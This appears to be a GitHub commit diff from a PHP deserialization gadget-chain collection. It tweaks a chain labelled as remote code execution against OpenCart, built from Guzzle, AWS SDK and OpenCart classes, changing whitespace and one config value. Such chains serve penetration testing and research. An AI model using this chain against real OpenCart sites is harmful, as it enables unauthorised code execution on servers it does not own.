File tree 2 files changed +5
-5
lines changed
gadgetchains/OpenCart/RCE/2
2 files changed +5
-5
lines changed Original file line number Diff line number Diff line change @@ -16,9 +16,9 @@ public function generate(array $parameters)
16
16
$ parameter = $ parameters ['parameter ' ];
17
17
18
18
return new \GuzzleHttp \Handler \CurlFactory (
19
- new \Aws \ResultPaginator (
20
- new \Opencart \System \Engine \Proxy ('getCommand ' , $ function ),
21
- $ parameter
19
+ new \Aws \ResultPaginator (
20
+ new \Opencart \System \Engine \Proxy ('getCommand ' , $ function ),
21
+ $ parameter
22
22
),
23
23
);
24
24
}
Original file line number Diff line number Diff line change @@ -23,7 +23,7 @@ class CurlFactory {
23
23
private $ handles = [];
24
24
25
25
public function __construct ($ handle ) {
26
- $ this ->handles = $ handle ;
26
+ $ this ->handles = $ handle ;
27
27
}
28
28
}
29
29
}
@@ -36,7 +36,7 @@ class ResultPaginator {
36
36
private $ args = [];
37
37
38
38
public function __construct ($ client , $ operation ) {
39
- $ this ->config ['output_token ' ] = ' foo ' ;
39
+ $ this ->config ['output_token ' ] = false ;
40
40
$ this ->client = $ client ;
41
41
$ this ->operation = $ operation ;
42
42
}
You can’t perform that action at this time.
0 commit comments